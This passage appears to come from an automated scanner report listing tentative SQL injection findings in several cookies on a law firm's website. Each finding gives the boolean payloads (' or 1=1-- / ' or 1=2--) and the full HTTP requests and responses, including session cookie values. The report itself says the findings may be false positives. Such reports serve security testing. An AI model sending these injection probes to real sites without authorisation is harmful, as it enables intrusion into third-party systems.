       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.70. http://www.pillsburylaw.com/index.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 21004035'%20or%201%3d1--%20 and 21004035'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman21004035'%20or%201%3d1--%20; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 12-May-2010 16:45:10 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman21004035'%20or%201%3d2--%20; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.71. http://www.pillsburylaw.com/index.cfm [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 18408764'%20or%201%3d1--%20 and 18408764'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4618408764'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Wed, 12-May-2010 16:45:53 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4618408764'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.72. http://www.pillsburylaw.com/index.cfm [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 63424578'%20or%201%3d1--%20 and 63424578'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A0163424578'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Wed, 12-May-2010 16:45:16 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A0163424578'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.73. http://www.pillsburylaw.com/index.cfm [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 14004939'%20or%201%3d1--%20 and 14004939'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee514004939'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 16:45:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee514004939'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...
1.74. http://www.pillsburylaw.com/index.cfm [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 12467860'%20or%201%3d1--%20 and 12467860'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee512467860'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 16:45:29 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee512467860'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
